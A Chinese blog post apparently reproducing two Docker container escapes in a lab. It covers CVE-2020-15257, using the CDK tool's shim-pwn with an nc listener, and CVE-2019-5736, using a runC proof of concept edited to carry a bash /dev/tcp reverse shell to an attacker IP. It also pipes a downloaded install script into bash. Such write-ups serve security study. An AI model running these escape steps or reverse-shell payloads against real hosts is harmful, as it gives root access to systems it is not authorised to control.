docker逃逸漏洞复现

最新推荐文章于 2023-03-27 18:14:03 发布
最新推荐文章于 2023-03-27 18:14:03 发布
阅读量380 收藏
点赞数 1
分类专栏: 安全漏洞 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42084004/article/details/118939571
版权

如何判断是否在docker工作环境下

  1. docker环境下:ls -alh /.dockerenv , 非docker环境,没有这个.dockerenv文件的(定制化比较高的docker系统也可能没有这个文件)

    在这里插入图片描述

  2. 查询系统进程的cgroup信息 cat /proc/1/cgroup

    在这里插入图片描述

CVE-2020-15257 容器逃逸漏洞利用

CVE-2020-15257的利用条件——net namespace(–net=host)与宿主机共享

以以下命令运行容器

docker run --rm --net=host -it b7278c37e6e7 /bin/bash

通过wget下载exp

wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz
tar -zxvf cdk_v0.1.6_release.tar.gz

在容器内执行 cat /proc/net/unix|grep -a "containerd-shim" 可看到抽象命名空间Unix域套接字,或者执行netstat -xl |grep shim

vps监听端口

nc -lvp 1111

执行exp

./cdk_linux_amd64 run shim-pwn 127.0.0.1 1111

vps收到shell

CVE-2019-5736

引用链接:https://www.cnblogs.com/xiaozi/p/13377619.html

需要宿主机docker exec重新进入容器才可以触发漏洞

漏洞简述:

攻击者可以通过特定的容器镜像或者exec操作可以获取到宿主机的runC执行时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限。

利用条件:

Docker版本 < 18.09.2,runC版本< 1.0-rc6。(在Docker 18.09.2之前的版本中使用了的runc版本小于1.0-rc6。)

可通过 docker 和docker-runc 查看当前版本情况。

漏洞环境准备:

curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh

# 下载POC
git clone https://github.com/Frichetten/CVE-2019-5736-PoC

# 修改Payload
vi main.go
payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.172.136/1234 0>&1"

# 编译生成payload
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

编译好将main文件传入容器内授予执行权限

./main

然后宿主机进入容器

docker exec -it  cafa20cfb0f9 /bin/sh

在这里插入图片描述

vps监听收到shell 查看IP地址为宿主机

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-t868UcN2-1626771332998)(image/image-20201230111200755.png)]

风欲来花满楼
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
如何检查 Docker 镜像是否存在漏洞_docker1,这原因我服了
2401_83973995的博客
04-20 572
于是,我开始调查这个问题,最终发现是我的同事偷偷地在我的 Docker 镜像里面存放了牛奶。哈哈哈,这个笑话真冷!我有一个朋友,他是个 Docker 爱好者,喜欢用 Docker 镜像部署他的应用程序。这个镜像看起来非常棒,但是他没有想到,这个镜像中有一个安全漏洞,可以让黑客入侵他的网站。最终,他发现了一个叫做“Clair”的工具,它可以自动扫描 Docker 镜像中的漏洞,并生成报告。所以,如果你也想成为一名 Docker 镜像的专家,那么就一定要学会手动检查 Docker 镜像以确保它们没有安全问题。
Docker逃逸漏洞复现(CVE-2019-5736)
blue_fantasy的博客
01-10 848
Text. 0x00 概述 2019年2月11日,runc的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现。该漏洞编号为CVE-2019-5736,漏洞影响在默认设置下运行的Docker容器,并且攻击者可以使用它来获得主机上的root级访问权限。 0x01 漏洞原理 漏洞点在于runc,runc是一个容器运行时,最初是作为Docker的一部分开发的,后来作为一个单独的开源工具和库被提取出来。作为“低级别”容器运行时,runc主
Docker暴露2375端口,引起安全漏洞
02-26
今天有小伙伴发现docker暴露出2375端口,引起了安全漏洞。我现在给大家介绍整个事情的来龙去脉,并告诉小伙伴们,怎么修复这个漏洞。为了实现集群管理,Docker提供了远程管理接口。DockerDaemon作为守护进程,运行在后台,可以执行发送到管理接口上的Docker命令。正是因为错误的使用了Docker远端接口,引起安全漏洞。国内牛人开发了一套牛逼的搜索引擎-钟馗之眼,可以扫描出主机上的暴露的端口。在ZoomEye.org上输入关键字dockerport:2375,立即可以扫描出所有暴露了2375端口的Docker主机。因为没有加密,知道了主机IP以后,黑客就可以为所欲为了。目前全球有7
docker逃逸漏洞复现(CVE-2019-5736)
网络安全。
01-29 1万+
0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现。该漏洞编号为CVE-2019-5736,漏洞影响在默认设置下运行的Docker容器,并且攻击者可以使用它来获得主机上的root级访问权限。 0x02 漏洞原理 漏洞点在于runC,RunC是一个容器运行时,最初是作为Docker的一部分开发的,后...
docker容器逃逸漏洞复现
温和的跳跃
01-23 287
今天研究这个,漏洞复现
docker逃逸复现(CVE-2020-15257-host模式容器逃逸漏洞
m0_63306943的博客
02-28 1142
因为docker所使用的是隔离技术,就导致了容器内的进程无法看到外面的进程,但外面的进程可以看到里面,所以如果一个 Docker 容器内部可以操作该容器的外部资源,一般理解为操作宿主机的行为。叫做docker逃逸host模式这种模式下,容器和主机已经没有网络隔离了,它们共享同一个网络命名空间,容器的网络配置和主机完全一样,使用主机的IP地址和端口,可以查看到主机所有网卡信息、网络资源,在网络性能上没有损耗。但也正是因为没有网络隔离,容器和主机容易产生网络资源冲突、争抢,以及其他的一些问题。
Docker逃逸原理
11-06
Docker有6大Namespace,PPT中分析了6个Namespace的基本原理和最终逃逸原理
Docker逃逸:从一个进程崩溃讲起.pdf
08-08
本议题会简单的介绍Docker和Apport并分享如何通过一个Apport漏洞来完成Docker逃逸。 From a crash to docker escape •Basics of docker •An apport vulnerability •A way to leverage CVE-2018-6552•Demo
Docker逃逸漏洞复现(CVE-2019-5736)_踩坑记
qq_42383069的博客
04-25 2859
漏洞复现 1、安装漏洞环境(Ubuntu 18.04) 下载脚本并执行: curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh 2、执行完后查看版本信息 3、拉取镜像并启动 docker pull vulhub/shiro:1.2.4 docker run -d -p 8080:8080 --name sh
Docker 逃逸 漏洞复现
最新发布
Jack_chao_的博客
03-27 1193
CVE-2020-15257-host模式容器逃逸漏洞分析
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
锋刃科技的博客
12-27 1272
漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containe...
CVE-2020-15257 Docker 容器逃逸复现
weixin_45260839的博客
07-15 1043
CVE-2020-15257 Docker 容器逃逸复现
漏洞复现Docker runC 容器逃逸漏洞(CVE-2019-5736)
做自己喜欢的事,并将其发挥到极致!
12-09 4936
2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在GitHub上公布。
docker逃逸漏洞(CVE-2019-5736)
热门推荐
chaojixiaojingang
12-23 1万+
1.漏洞描述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在...
漏洞复现 - - -Docker未授权访问漏洞
weixin_67503304的博客
08-16 4800
Docker未授权访问漏洞docker未授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
docker逃逸漏洞总结
02-14
Docker 逃逸漏洞主要有两种:第一种是由于容器中的应用程序的设计错误而导致的;第二种是由于容器的安全设置不当而导致的。为了避免这两种漏洞,建议在部署容器时,应该采用一些安全的措施,如控制容器的访问权限、限制容器的网络通信等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值